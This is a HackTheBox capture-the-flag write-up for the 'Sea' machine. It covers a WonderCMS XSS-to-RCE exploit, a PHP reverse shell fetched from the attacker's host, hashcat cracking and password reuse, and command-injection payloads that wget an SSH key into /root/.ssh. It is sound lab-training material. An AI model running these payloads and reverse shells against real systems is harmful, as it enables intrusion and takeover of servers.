WriteupsHTB — Sea
WebEasyLinux
HTB — Sea
WonderCMS CVE-2023-41425 XSS to RCE via theme upload. Credential reuse for lateral movement. Port-forwarded internal tool for command injection privesc.
January 14, 2025HackTheBox
#WonderCMS#XSS#RCE#Command Injection
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.28
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 08:54 EST
Nmap scan report for 10.10.11.28
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/14%OT=22%CT=1%CU=37073%PV=Y%DS=2%DC=T%G=Y%TM=6786
OS:6CA1%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=FE%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST1
OS:1NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:3CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 23.95 ms 10.10.14.1
2 24.04 ms 10.10.11.28
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.02 seconds80/tcp open http
sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
sh
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.28 - - [14/Jan/2025 09:02:36] "GET / HTTP/1.1" 200 -
sh
dirsearch -u http://sea.htb/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Sea/reports/http_sea.htb/__25-01-14_09-14-06.txt
Target: http://sea.htb/
[09:14:06] Starting:
[09:14:06] 403 - 199B - /%3f/
[09:14:08] 403 - 199B - /.ht_wsr.txt
[09:14:08] 403 - 199B - /.htaccess.bak1
[09:14:08] 403 - 199B - /.htaccess.sample
[09:14:08] 403 - 199B - /.htaccessOLD
[09:14:08] 403 - 199B - /.htaccess_extra
[09:14:08] 403 - 199B - /.htaccess_orig
[09:14:08] 403 - 199B - /.htaccessOLD2
[09:14:08] 403 - 199B - /.htaccess_sc
[09:14:08] 403 - 199B - /.html
[09:14:08] 403 - 199B - /.htm
[09:14:08] 403 - 199B - /.htaccess.orig
[09:14:08] 403 - 199B - /.htaccessBAK
[09:14:08] 403 - 199B - /.httr-oauth
[09:14:08] 403 - 199B - /.htaccess.save
[09:14:08] 403 - 199B - /.htpasswd_test
[09:14:08] 403 - 199B - /.htpasswds
[09:14:09] 403 - 199B - /.php
[09:14:11] 200 - 1KB - /404
[09:14:14] 403 - 199B - /admin%20/
[09:14:26] 200 - 939B - /contact.php
[09:14:27] 301 - 228B - /data -> http://sea.htb/data/
[09:14:27] 403 - 199B - /data/
[09:14:27] 403 - 199B - /data/files/
[09:14:36] 403 - 199B - /login.wdm%20
[09:14:38] 301 - 232B - /messages -> http://sea.htb/messages/
[09:14:40] 403 - 199B - /New%20Folder
[09:14:40] 403 - 199B - /New%20folder%20(2)
[09:14:42] 403 - 199B - /phpliteadmin%202.php
[09:14:43] 301 - 231B - /plugins -> http://sea.htb/plugins/
[09:14:43] 403 - 199B - /plugins/
[09:14:45] 403 - 199B - /Read%20Me.txt
[09:14:48] 403 - 199B - /server-status
[09:14:48] 403 - 199B - /server-status/
[09:14:52] 403 - 199B - /themes/
[09:14:52] 301 - 230B - /themes -> http://sea.htb/themes/sh
dirsearch -u http://sea.htb/themes/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Sea/reports/http_sea.htb/_themes__25-01-14_09-16-14.txt
Target: http://sea.htb/
[09:16:14] Starting: themes/
[09:16:20] 200 - 1KB - /themes/404
[09:16:22] 200 - 1KB - /themes/admin/home
[09:16:40] 200 - 1KB - /themes/home
[09:16:57] 200 - 1KB - /themes/sitecore/content/home
[09:17:00] 200 - 1KB - /themes/sym/root/home/
WonderCMS 3.2.0
- search google wondercms 3.2.0 exploit
CVE-2023-41425
- https://gist.github.com/prodigiousMind/fc69a796...
sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.6 80
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 80
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.6:8000/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...- from the exploit it is pulling a
main.zipfile were it contains a directory calledrevshell-mainand inside a php reverse shellrev.php - we can grab the author's zip file and modify the content here: https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip
- also need to modfy where it is hosting it at line
17
sh
mv revshell-main.zip main.zipsh
python3 exploit.py http://sea.htb/wondercms/loginURL 10.10.14.6 1234
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 1234
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/wondercms/index.php?page=loginURL?"></form><script+src="http://10.10.14.6/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.28 - - [14/Jan/2025 15:22:20] "GET /xss.js HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:29] "GET /main.zip HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:29] "GET /main.zip HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:30] "GET /main.zip HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:30] "GET /main.zip HTTP/1.1" 200 -- go to
http://sea.htb/themes/revshell-main/rev.php
- triger the exploit by going to
sh
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.6&lport=1234rev shell
sh
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.28] 52780
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
22:34:41 up 3:55, 0 users, load average: 1.84, 1.72, 1.70
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-datash
$ python3 -c 'import pty; pty.spawn("/bin/bash")'database.js
js
www-data@sea:/var/www/sea/data$ cat database.js
cat database.js
{
"config": {
"siteTitle": "Sea",
"theme": "bike",
"defaultPage": "home",
"login": "loginURL",
"forceLogout": false,
"forceHttps": false,
"saveChangesPopup": false,
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
"lastLogins": {- removing the backslashes
txt
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4qhashcat
sh
hashcat -m 3200 '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' /usr/share/wordlists/rockyou.txt
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromancemychemicalromance
reuse password
amay:mychemicalromance
sh
www-data@sea:/home$ su amay
su amay
Password: mychemicalromance
amay@sea:/home$ whoami
whoami
amayuser.txt
sh
amay@sea:~$ cat user.txt
cat user.txt
f7b95568...priv esc
sh
amay@sea:~$ uname -a
uname -a
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linuxlocal portforward
sh
ssh -L 8000:localhost:8080 -L 60793:localhost:60793 amay@10.10.11.28port 8000 (Command Injection)
- can login with
amay:mychemicalromance
- connection will quick right away
sh
amay@sea:~$ nc -lvnp 1235
Listening on 0.0.0.0 1235
Connection received on 127.0.0.1 39052
whoami
root
planting publey key
sh
ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): id_rsa
id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again: 
txt
log_file=/var/www/html;wget+-P+/root/.ssh+http://10.10.14.6/id_rsa.pub;#&analyze_log=
rename id_rsa.pub to authorized_keys
txt
log_file=/var/www/html;mv+/root/.ssh/id_rsa.pub+/root/.ssh/authorized_keys;#&analyze_log=- login with own private key
sh
ssh -i id_rsa root@10.10.11.28
Enter passphrase for key 'id_rsa':sh
root@sea:~# whoami
rootsh
root@sea:~# cat root.txt
e3d906a7...Up next
EasyJan 2025
HTB — Remote
Umbraco CMS with anonymous NFS mount exposing credentials. Authenticated SXSS/RCE via template. TeamViewer 7 password decryption for SYSTEM.
Read writeup
MediumJan 2025
HTB — Mentor
SNMP v3 credential brute-force yields API secret. Command injection in backup API endpoint. PostgreSQL password enables lateral movement and sudo root.
Read writeup
EasyJan 2025
HTB — Usage
Laravel admin panel SQL injection via search parameter. Malicious PNG for RCE via file upload. Wildcard file read on sudo binary for root flag.
Read writeup